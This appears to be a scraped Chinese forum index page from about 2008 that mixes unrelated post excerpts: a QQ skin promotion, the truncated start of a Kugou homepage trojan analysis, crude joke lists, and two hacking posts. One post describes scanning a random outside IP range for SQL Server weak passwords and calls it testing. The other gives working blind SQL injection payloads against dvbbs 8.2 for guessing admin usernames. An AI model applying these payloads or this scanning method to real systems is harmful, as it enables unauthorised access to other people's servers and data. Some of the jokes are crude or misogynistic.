设计超级精美的QQ2008皮肤主题 - [腾讯一族]
QQ几乎成了大部分人打开电脑上网后要启动的第一个软件了,虽然QQ2008开始,默认的QQ主题已经不断地在变化了,可是在大多数人的眼里,它始终还是那么的一成不变呢!今天给大家介绍一款设计得相当唯美的QQ皮肤,该皮肤名为Aperture!
该款Aperture QQ皮肤是由“天气雨”制作的,话说他可是相当厉害的一位设计强人呢,希望该QQ主题能change 一下你QQ的心情吧 ^_^ 对于QQ主题就没什么可介绍的了,图片胜过千言万语呵呵~看吧!
酷狗音乐首页隐蔽挂马详细分析+72只马 - [技术文档]
作者: yimike
来源: 剑盟
近来有朋友反映酷狗音乐首页挂马,而且奇怪的是只有第一次访问该页时杀软会提示挂马;之后除非换IP,否则无论怎么刷新杀软都不会提示网页挂马。于是循着这个线索,打开了酷狗音乐首页(h**p://www.kugou.com/home),最终找到了极其隐蔽的挂马。
详细过程如下:
1.h**p://www.kugou.com/home该页面代码看似正常,但是有个看起来比较正常但是却比较隐蔽的iframe,代码如下:
企业服务器安全性测试 SQL Server弱口令测试 - [技术文档]
企业服务器安全性测试 SQL Server弱口令测试
对于企业而言,服务器的重要性是不言而喻的。因此管理员们往往以维持服务器的稳定、高效地运行作为自己的工作目标,但是对于服务器的安全性往往考虑得较少,至少对于某些管理员是这样的。
最近笔者进行了一例服务器的安全测试,下面把这例测试过程写下来,希望对大家有所启示。
测试工具:
1.S扫描器(一种速度极快的多线程命令行下的扫描工具)
2.SQL登陆器
3.DNS溢出工具
4.cmd(微软命令行工具)
4.scansql.exe(SQL弱口令扫描工具)
SQL Server弱口令测试
1.缘由:
SQL Server是很多中小型企业、事业单位的首选数据库系统,由于一些管理员的疏忽或者安全意识淡薄,总是以数据库默认的用户SA登录数据库,并且采用了默认的空密码或者设置了若口令。
2.测试:
以笔者本机IP为中心,随机选取了一个IP段进行测试。
第一步:在命令提示符下运行s扫描器,输入一个IP段:
s syn 61.178.*.1 61.178.*.254 1433 扫描到13个开了1433端口的服务器。(图1)
:★全新唯物哲学:2008年最龌龊语录n句 - [扯逼灌水]
001◎老鼠一发威,大家都是病猫。
002◎和一MM争论鲸鱼是不是鱼,最后我说“曰本人也带个人字”,她这才同意鲸鱼不是鱼。
003◎男人膝下有黄金,我把整个腿都切下来了,连块铜也没找着!
004◎春天我把玉米埋在土里,到了秋天我就会收获很多玉米。春天我把老婆埋在土里,到了秋天我就会…被枪毙!
005◎如果你看到面前的阴影,别怕,那是因为你的背后有阳光!
006◎踏遍青楼人未老,请用汇仁肾宝。
007◎听君一席话,省我十本书!
008◎0岁出场亮相,10岁天天向上。20岁远大理想,30岁发奋图强。40岁基本定向,50岁处处吃香。60岁打打麻将,70岁处处闲逛。80岁拉拉家常,90岁挂在墙上!
009◎脱了衣服我是禽兽,穿上衣服我是衣冠禽兽!
010◎师太,你就从了老衲吧!…很久很久以后…师太,你就饶了老衲吧!
011◎“亲爱的,我…我怀孕了…三个月了,不过你放心,不是你的,不用你负责……”
012◎我们产生一点小分歧:她希望我把粪土变黄金,我希望她视黄金如粪土。
013◎读10年语文,不如聊半年QQ。
014◎早晨懒床,遂从口袋里掏出6枚硬币:如果抛出去六个都是正面,我就去上课!思躇良久,还是算了,别冒这个险了……
015◎我花8万买了个西周陶罐,昨儿到《鉴宝》栏目进行鉴定,专家严肃地说:“这哪是西周的?这是上周的!”
最新爆笑网络语 - [扯逼灌水]
◆ 吃自助最高境界:扶墙进,扶墙出。
◆ 结婚必备条件:有车有房,父母双亡。
◆ 没有钱,没有权,再不对你好点,你能跟我?
◆ 拿份报纸上厕所,俺是读书人。
◆ 上Google上百度一下。
◆ 女人一定要对自己好一点。一旦累死了,就会有别的女人花你的钱,住你的房,睡你的老公,打你的娃!
◆ 你的丑和你的脸没有关系……
◆ 长个包子样,就别怨狗跟着。
◆ 争吵的时候,男人和女人的区别就像步枪和机关枪的区别。
◆ 爷爷都是从孙子走过来的……
◆ 老天,你让夏天和冬天同房了吧?生出这种鬼天气!
◆ 鸟大了什么林子都有!
◆ 听说女人如衣服,兄弟如手足。回想起来,咱这尊千手观音竟然裸奔了20多年!
dvbbs 8.2 注入漏洞利用 - [技术文档]
漏洞利用:(access版)
由于使用验证码,该漏洞只能纯手工进行注入尝试,在用户登陆页面,用户名处构造sql语句
如:
判断
Where' and '1'='1
where' and '1'='2
密码任意6位,输入验证码,根据返回信息,第一条显示用户名或密码错误第二条显示无此用户,猜解用户
where' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1
where' and 1=(select count(*) from dv_admin where left(username,2)='ad') and '1'='1
………………………
